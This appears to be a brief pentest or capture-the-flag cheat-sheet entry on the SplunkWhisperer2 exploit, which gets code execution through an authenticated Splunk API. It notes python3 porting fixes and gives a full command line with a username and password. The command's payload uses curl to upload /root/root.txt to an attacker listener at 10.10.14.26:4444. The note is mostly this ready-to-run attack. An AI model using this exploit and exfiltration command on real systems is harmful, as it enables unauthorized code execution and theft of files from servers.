Splunk Wispherer

rce, devops

Overview #

Authenticated attacker can send malicuous package to splunk API and execute it. This can be done remotely or locally.

Using python3 on local exploit #

# replace functions
raw_input() --> input()
print "some text" --> print("some text")
python3 PySplunkWhisperer2_local.py --port 8089 --username shaun --password Guitar123 --payload "curl -F 'data=@/root/root.txt' http://10.10.14.26:4444"

References #